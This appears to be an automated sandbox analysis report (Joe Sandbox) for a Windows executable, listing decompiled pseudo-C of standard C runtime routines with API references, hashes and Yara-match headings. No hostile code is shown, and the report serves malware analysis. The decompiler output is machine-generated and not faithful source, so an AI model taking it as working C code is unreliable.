                                                                        					_v8 = 0;
                                                                        					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
                                                                        					_t16 = E0040FA20(__edx, _t39, _t39);
                                                                        					__eflags = _t16 - 0xffffffff;
                                                                        					if(_t16 == 0xffffffff) {
                                                                        						L6:
                                                                        						_t17 = 0x4227e0;
                                                                        					} else {
                                                                        						_t21 = E0040FA20(__edx, _t39, _t39);
                                                                        						__eflags = _t21 - 0xfffffffe;
                                                                        						if(_t21 == 0xfffffffe) {
                                                                        							goto L6;
                                                                        						} else {
                                                                        							_t22 = E0040FA20(__edx, _t39, _t39);
                                                                        							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
                                                                        						}
                                                                        					}
                                                                        					_t9 = _t17 + 4; // 0xa80
                                                                        					 *(_t17 + 4) =  *_t9 & 0x000000fd;
                                                                        					_v8 = 0xfffffffe;
                                                                        					E0040C735(_t39);
                                                                        					_t19 = 0;
                                                                        					__eflags = 0;
                                                                        				} else {
                                                                        					_t27 = E0040BFC1(_t51);
                                                                        					_t40 = 0x16;
                                                                        					 *_t27 = _t40;
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					E0040E744(__edx, _t40, 0);
                                                                        					_t19 = _t40;
                                                                        				}
                                                                        				return E0040E21D(_t19);
                                                                        			}














                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 0040C6C8
                                                                        • __fileno.LIBCMT ref: 0040C6D6
                                                                        • __fileno.LIBCMT ref: 0040C6E2
                                                                        • __fileno.LIBCMT ref: 0040C6EE
                                                                        • __fileno.LIBCMT ref: 0040C6FE
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2805327698-0
                                                                        • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                        • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                        • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				signed int _t15;
                                                                        				LONG* _t21;
                                                                        				long _t23;
                                                                        				void* _t31;
                                                                        				LONG* _t33;
                                                                        				void* _t34;
                                                                        				void* _t35;
                                                                        
                                                                        				_t35 = __eflags;
                                                                        				_t29 = __edx;
                                                                        				_t25 = __ebx;
                                                                        				_push(0xc);
                                                                        				_push(0x421490);
                                                                        				E0040E1D8(__ebx, __edi, __esi);
                                                                        				_t31 = E00410735(__ebx, __edx, __edi, _t35);
                                                                        				_t15 =  *0x422e34; // 0xfffffffe
                                                                        				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                        					E0040D6E0(_t25, 0xd);
                                                                        					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        					 *(_t34 - 0x1c) = _t33;
                                                                        					__eflags = _t33 -  *0x422d38; // 0x871660
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _t33;
                                                                        						if(_t33 != 0) {
                                                                        							_t23 = InterlockedDecrement(_t33);
                                                                        							__eflags = _t23;
                                                                        							if(_t23 == 0) {
                                                                        								__eflags = _t33 - 0x422910;
                                                                        								if(__eflags != 0) {
                                                                        									_push(_t33);
                                                                        									E0040B6B5(_t25, _t31, _t33, __eflags);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						_t21 =  *0x422d38; // 0x871660
                                                                        						 *(_t31 + 0x68) = _t21;
                                                                        						_t33 =  *0x422d38; // 0x871660
                                                                        						 *(_t34 - 0x1c) = _t33;
                                                                        						InterlockedIncrement(_t33);
                                                                        					}
                                                                        					 *(_t34 - 4) = 0xfffffffe;
                                                                        					E00414067();
                                                                        				} else {
                                                                        					_t33 =  *(_t31 + 0x68);
                                                                        				}
                                                                        				if(_t33 == 0) {
                                                                        					E0040E79A(_t29, _t31, 0x20);
                                                                        				}
                                                                        				return E0040E21D(_t33);
                                                                        			}











                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00413FD8
                                                                          • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                          • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                        • __amsg_exit.LIBCMT ref: 00413FF8
                                                                        • __lock.LIBCMT ref: 00414008
                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                        • InterlockedIncrement.KERNEL32(00871660), ref: 00414050
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                        • String ID:
                                                                        • API String ID: 4271482742-0
                                                                        • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                        • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                        • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00413610() {
                                                                        				signed long long _v12;
                                                                        				signed int _v20;
                                                                        				signed long long _v28;
                                                                        				signed char _t8;
                                                                        
                                                                        				_t8 = GetModuleHandleA("KERNEL32");
                                                                        				if(_t8 == 0) {
                                                                        					L6:
                                                                        					_v20 =  *0x41fb50;
                                                                        					_v28 =  *0x41fb48;
                                                                        					asm("fsubr qword [ebp-0x18]");
                                                                        					_v12 = _v28 / _v20 * _v20;
                                                                        					asm("fld1");
                                                                        					asm("fcomp qword [ebp-0x8]");
                                                                        					asm("fnstsw ax");
                                                                        					if((_t8 & 0x00000005) != 0) {
                                                                        						return 0;
                                                                        					} else {
                                                                        						return 1;
                                                                        					}
                                                                        				} else {
                                                                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                        					if(__eax == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_push(0);
                                                                        						return __eax;
                                                                        					}
                                                                        				}
                                                                        			}








                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressHandleModuleProc
                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                        • API String ID: 1646373207-3105848591
                                                                        • Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
                                                                        • Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
                                                                        • Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040C748(void* __edx, void* __esi, char _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				signed int _t70;
                                                                        				signed int _t71;
                                                                        				intOrPtr _t73;
                                                                        				signed int _t75;
                                                                        				signed int _t81;
                                                                        				char _t82;
                                                                        				signed int _t84;
                                                                        				intOrPtr* _t86;
                                                                        				signed int _t87;
                                                                        				intOrPtr* _t90;
                                                                        				signed int _t92;
                                                                        				signed int _t94;
                                                                        				void* _t96;
                                                                        				signed char _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr _t102;
                                                                        				signed int _t103;
                                                                        				intOrPtr* _t104;
                                                                        				signed int _t111;
                                                                        				signed int _t114;
                                                                        				intOrPtr _t115;
                                                                        
                                                                        				_t105 = __esi;
                                                                        				_t97 = __edx;
                                                                        				_t104 = _a4;
                                                                        				_t87 = 0;
                                                                        				_t121 = _t104;
                                                                        				if(_t104 != 0) {
                                                                        					_t70 = E0040FA20(__edx, _t104, _t104);
                                                                        					__eflags =  *(_t104 + 4);
                                                                        					_v8 = _t70;
                                                                        					if(__eflags < 0) {
                                                                        						 *(_t104 + 4) = 0;
                                                                        					}
                                                                        					_push(1);
                                                                        					_push(_t87);
                                                                        					_push(_t70);
                                                                        					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
                                                                        					__eflags = _t71 - _t87;
                                                                        					_v12 = _t71;
                                                                        					if(_t71 < _t87) {
                                                                        						L2:
                                                                        						return _t71 | 0xffffffff;
                                                                        					} else {
                                                                        						_t98 =  *(_t104 + 0xc);
                                                                        						__eflags = _t98 & 0x00000108;
                                                                        						if((_t98 & 0x00000108) != 0) {
                                                                        							_t73 =  *_t104;
                                                                        							_t92 =  *(_t104 + 8);
                                                                        							_push(_t105);
                                                                        							_v16 = _t73 - _t92;
                                                                        							__eflags = _t98 & 0x00000003;
                                                                        							if((_t98 & 0x00000003) == 0) {
                                                                        								__eflags = _t98;
                                                                        								if(__eflags < 0) {
                                                                        									L15:
                                                                        									__eflags = _v12 - _t87;
                                                                        									if(_v12 != _t87) {
                                                                        										__eflags =  *(_t104 + 0xc) & 0x00000001;
                                                                        										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
                                                                        											L40:
                                                                        											_t75 = _v16 + _v12;
                                                                        											__eflags = _t75;
                                                                        											L41:
                                                                        											return _t75;
                                                                        										}
                                                                        										_t99 =  *(_t104 + 4);
                                                                        										__eflags = _t99 - _t87;
                                                                        										if(_t99 != _t87) {
                                                                        											_t90 = 0x423f60 + (_v8 >> 5) * 4;
                                                                        											_a4 = _t73 - _t92 + _t99;
                                                                        											_t111 = (_v8 & 0x0000001f) << 6;
                                                                        											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
                                                                        											if(__eflags == 0) {
                                                                        												L39:
                                                                        												_t66 =  &_v12;
                                                                        												 *_t66 = _v12 - _a4;
                                                                        												__eflags =  *_t66;
                                                                        												goto L40;
                                                                        											}
                                                                        											_push(2);
                                                                        											_push(0);
                                                                        											_push(_v8);
                                                                        											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
                                                                        											if(__eflags != 0) {
                                                                        												_push(0);
                                                                        												_push(_v12);
                                                                        												_push(_v8);
                                                                        												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
                                                                        												__eflags = _t81;
                                                                        												if(_t81 >= 0) {
                                                                        													_t82 = 0x200;
                                                                        													__eflags = _a4 - 0x200;
                                                                        													if(_a4 > 0x200) {
                                                                        														L35:
                                                                        														_t82 =  *((intOrPtr*)(_t104 + 0x18));
                                                                        														L36:
                                                                        														_a4 = _t82;
                                                                        														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
                                                                        														L37:
                                                                        														if(__eflags != 0) {
                                                                        															_t63 =  &_a4;
                                                                        															 *_t63 = _a4 + 1;
                                                                        															__eflags =  *_t63;
                                                                        														}
                                                                        														goto L39;
                                                                        													}
                                                                        													_t94 =  *(_t104 + 0xc);
                                                                        													__eflags = _t94 & 0x00000008;
                                                                        													if((_t94 & 0x00000008) == 0) {
                                                                        														goto L35;
                                                                        													}
                                                                        													__eflags = _t94 & 0x00000400;
                                                                        													if((_t94 & 0x00000400) == 0) {
                                                                        														goto L36;
                                                                        													}
                                                                        													goto L35;
                                                                        												}
                                                                        												L31:
                                                                        												_t75 = _t81 | 0xffffffff;
                                                                        												goto L41;
                                                                        											}
                                                                        											_t84 =  *(_t104 + 8);
                                                                        											_t96 = _a4 + _t84;
                                                                        											while(1) {
                                                                        												__eflags = _t84 - _t96;
                                                                        												if(_t84 >= _t96) {
                                                                        													break;
                                                                        												}
                                                                        												__eflags =  *_t84 - 0xa;
                                                                        												if( *_t84 == 0xa) {
                                                                        													_t44 =  &_a4;
                                                                        													 *_t44 = _a4 + 1;
                                                                        													__eflags =  *_t44;
                                                                        												}
                                                                        												_t84 = _t84 + 1;
                                                                        												__eflags = _t84;
                                                                        											}
                                                                        											__eflags =  *(_t104 + 0xc) & 0x00002000;
                                                                        											goto L37;
                                                                        										}
                                                                        										_v16 = _t87;
                                                                        										goto L40;
                                                                        									}
                                                                        									_t75 = _v16;
                                                                        									goto L41;
                                                                        								}
                                                                        								_t81 = E0040BFC1(__eflags);
                                                                        								 *_t81 = 0x16;
                                                                        								goto L31;
                                                                        							}
                                                                        							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
                                                                        							_t114 = (_v8 & 0x0000001f) << 6;
                                                                        							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
                                                                        							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t103 = _t92;
                                                                        							__eflags = _t103 - _t73;
                                                                        							if(_t103 >= _t73) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t115 = _t73;
                                                                        							do {
                                                                        								__eflags =  *_t103 - 0xa;
                                                                        								if( *_t103 == 0xa) {
                                                                        									_v16 = _v16 + 1;
                                                                        									_t87 = 0;
                                                                        									__eflags = 0;
                                                                        								}
                                                                        								_t103 = _t103 + 1;
                                                                        								__eflags = _t103 - _t115;
                                                                        							} while (_t103 < _t115);
                                                                        							goto L15;
                                                                        						}
                                                                        						return _t71 -  *(_t104 + 4);
                                                                        					}
                                                                        				}
                                                                        				_t86 = E0040BFC1(_t121);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				 *_t86 = 0x16;
                                                                        				_t71 = E0040E744(__edx, _t104, __esi);
                                                                        				goto L2;
                                                                        			}































                                                                        APIs
                                                                        • __fileno.LIBCMT ref: 0040C77C
                                                                        • __locking.LIBCMT ref: 0040C791
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 2395185920-0
                                                                        • Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
                                                                        • Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
                                                                        • Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0040BAAA(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t61;
                                                                        				signed int _t63;
                                                                        				void* _t68;
                                                                        				signed int _t69;
                                                                        				signed int _t72;
                                                                        				signed int _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t77;
                                                                        				signed int _t78;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t84;
                                                                        				signed int _t88;
                                                                        				signed int _t97;
                                                                        				signed int _t98;
                                                                        				signed int _t99;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t101;
                                                                        
                                                                        				_t90 = __edx;
                                                                        				if(_a8 == 0 || _a12 == 0) {
                                                                        					L4:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t100 = _a16;
                                                                        					_t105 = _t100;
                                                                        					if(_t100 != 0) {
                                                                        						_t82 = _a4;
                                                                        						__eflags = _t82;
                                                                        						if(__eflags == 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t63 = _t59 | 0xffffffff;
                                                                        						_t90 = _t63 % _a8;
                                                                        						__eflags = _a12 - _t63 / _a8;
                                                                        						if(__eflags > 0) {
                                                                        							goto L3;
                                                                        						}
                                                                        						_t97 = _a8 * _a12;
                                                                        						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                        						_v8 = _t82;
                                                                        						_v16 = _t97;
                                                                        						_t81 = _t97;
                                                                        						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                        							_v12 = 0x1000;
                                                                        						} else {
                                                                        							_v12 =  *(_t100 + 0x18);
                                                                        						}
                                                                        						__eflags = _t97;
                                                                        						if(_t97 == 0) {
                                                                        							L32:
                                                                        							return _a12;
                                                                        						} else {
                                                                        							do {
                                                                        								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                        								__eflags = _t84;
                                                                        								if(_t84 == 0) {
                                                                        									L18:
                                                                        									__eflags = _t81 - _v12;
                                                                        									if(_t81 < _v12) {
                                                                        										_t68 = E0040F0AD(_t90, _t97,  *_v8, _t100);
                                                                        										__eflags = _t68 - 0xffffffff;
                                                                        										if(_t68 == 0xffffffff) {
                                                                        											L34:
                                                                        											_t69 = _t97;
                                                                        											L35:
                                                                        											return (_t69 - _t81) / _a8;
                                                                        										}
                                                                        										_v8 = _v8 + 1;
                                                                        										_t72 =  *(_t100 + 0x18);
                                                                        										_t81 = _t81 - 1;
                                                                        										_v12 = _t72;
                                                                        										__eflags = _t72;
                                                                        										if(_t72 <= 0) {
                                                                        											_v12 = 1;
                                                                        										}
                                                                        										goto L31;
                                                                        									}
                                                                        									__eflags = _t84;
                                                                        									if(_t84 == 0) {
                                                                        										L21:
                                                                        										__eflags = _v12;
                                                                        										_t98 = _t81;
                                                                        										if(_v12 != 0) {
                                                                        											_t75 = _t81;
                                                                        											_t90 = _t75 % _v12;
                                                                        											_t98 = _t98 - _t75 % _v12;
                                                                        											__eflags = _t98;
                                                                        										}
                                                                        										_push(_t98);
                                                                        										_push(_v8);
                                                                        										_push(E0040FA20(_t90, _t98, _t100));
                                                                        										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
                                                                        										_t101 = _t101 + 0xc;
                                                                        										__eflags = _t74 - 0xffffffff;
                                                                        										if(_t74 == 0xffffffff) {
                                                                        											L36:
                                                                        											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                        											_t69 = _v16;
                                                                        											goto L35;
                                                                        										} else {
                                                                        											_t88 = _t98;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 <= _t98) {
                                                                        												_t88 = _t74;
                                                                        											}
                                                                        											_v8 = _v8 + _t88;
                                                                        											_t81 = _t81 - _t88;
                                                                        											__eflags = _t74 - _t98;
                                                                        											if(_t74 < _t98) {
                                                                        												goto L36;
                                                                        											} else {
                                                                        												L27:
                                                                        												_t97 = _v16;
                                                                        												goto L31;
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        									_t77 = E0040C1FB(_t100);
                                                                        									__eflags = _t77;
                                                                        									if(_t77 != 0) {
                                                                        										goto L34;
                                                                        									}
                                                                        									goto L21;
                                                                        								}
                                                                        								_t78 =  *(_t100 + 4);
                                                                        								__eflags = _t78;
                                                                        								if(__eflags == 0) {
                                                                        									goto L18;
                                                                        								}
                                                                        								if(__eflags < 0) {
                                                                        									_t48 = _t100 + 0xc;
                                                                        									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                        									__eflags =  *_t48;
                                                                        									goto L34;
                                                                        								}
                                                                        								_t99 = _t81;
                                                                        								__eflags = _t81 - _t78;
                                                                        								if(_t81 >= _t78) {
                                                                        									_t99 = _t78;
                                                                        								}
                                                                        								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                        								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                        								 *_t100 =  *_t100 + _t99;
                                                                        								_t101 = _t101 + 0xc;
                                                                        								_t81 = _t81 - _t99;
                                                                        								_v8 = _v8 + _t99;
                                                                        								goto L27;
                                                                        								L31:
                                                                        								__eflags = _t81;
                                                                        							} while (_t81 != 0);
                                                                        							goto L32;
                                                                        						}
                                                                        					}
                                                                        					L3:
                                                                        					_t61 = E0040BFC1(_t105);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					 *_t61 = 0x16;
                                                                        					E0040E744(_t90, 0, _t100);
                                                                        					goto L4;
                                                                        				}
                                                                        			}





























                                                                        APIs
                                                                        • __flush.LIBCMT ref: 0040BB6E
                                                                        • __fileno.LIBCMT ref: 0040BB8E
                                                                        • __locking.LIBCMT ref: 0040BB95
                                                                        • __flsbuf.LIBCMT ref: 0040BBC0
                                                                          • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                          • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                        • String ID:
                                                                        • API String ID: 3240763771-0
                                                                        • Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                        • Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
                                                                        • Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
                                                                        • Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                        				char _v8;
                                                                        				signed int _v12;
                                                                        				char _v20;
                                                                        				char _t43;
                                                                        				char _t46;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				int _t57;
                                                                        				int _t58;
                                                                        				signed short* _t59;
                                                                        				short* _t60;
                                                                        				int _t65;
                                                                        				char* _t72;
                                                                        
                                                                        				_t72 = _a8;
                                                                        				if(_t72 == 0 || _a12 == 0) {
                                                                        					L5:
                                                                        					return 0;
                                                                        				} else {
                                                                        					if( *_t72 != 0) {
                                                                        						E0040EC86( &_v20, _a16);
                                                                        						_t43 = _v20;
                                                                        						__eflags =  *(_t43 + 0x14);
                                                                        						if( *(_t43 + 0x14) != 0) {
                                                                        							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
                                                                        							__eflags = _t46;
                                                                        							if(_t46 == 0) {
                                                                        								__eflags = _a4;
                                                                        								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                        								if(__eflags != 0) {
                                                                        									L10:
                                                                        									__eflags = _v8;
                                                                        									if(_v8 != 0) {
                                                                        										_t53 = _v12;
                                                                        										_t11 = _t53 + 0x70;
                                                                        										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                        										__eflags =  *_t11;
                                                                        									}
                                                                        									return 1;
                                                                        								}
                                                                        								L21:
                                                                        								_t54 = E0040BFC1(__eflags);
                                                                        								 *_t54 = 0x2a;
                                                                        								__eflags = _v8;
                                                                        								if(_v8 != 0) {
                                                                        									_t54 = _v12;
                                                                        									_t33 = _t54 + 0x70;
                                                                        									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                        									__eflags =  *_t33;
                                                                        								}
                                                                        								return _t54 | 0xffffffff;
                                                                        							}
                                                                        							_t56 = _v20;
                                                                        							_t65 =  *(_t56 + 0xac);
                                                                        							__eflags = _t65 - 1;
                                                                        							if(_t65 <= 1) {
                                                                        								L17:
                                                                        								__eflags = _a12 -  *(_t56 + 0xac);
                                                                        								if(__eflags < 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								__eflags = _t72[1];
                                                                        								if(__eflags == 0) {
                                                                        									goto L21;
                                                                        								}
                                                                        								L19:
                                                                        								_t57 =  *(_t56 + 0xac);
                                                                        								__eflags = _v8;
                                                                        								if(_v8 == 0) {
                                                                        									return _t57;
                                                                        								}
                                                                        								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                        								return _t57;
                                                                        							}
                                                                        							__eflags = _a12 - _t65;
                                                                        							if(_a12 < _t65) {
                                                                        								goto L17;
                                                                        							}
                                                                        							__eflags = _a4;
                                                                        							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                        							__eflags = _t58;
                                                                        							_t56 = _v20;
                                                                        							if(_t58 != 0) {
                                                                        								goto L19;
                                                                        							}
                                                                        							goto L17;
                                                                        						}
                                                                        						_t59 = _a4;
                                                                        						__eflags = _t59;
                                                                        						if(_t59 != 0) {
                                                                        							 *_t59 =  *_t72 & 0x000000ff;
                                                                        						}
                                                                        						goto L10;
                                                                        					} else {
                                                                        						_t60 = _a4;
                                                                        						if(_t60 != 0) {
                                                                        							 *_t60 = 0;
                                                                        						}
                                                                        						goto L5;
                                                                        					}
                                                                        				}
                                                                        			}


















                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
                                                                        • __isleadbyte_l.LIBCMT ref: 00415307
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.292171350.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.292171350.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.292171350.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_400000_aPsf.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
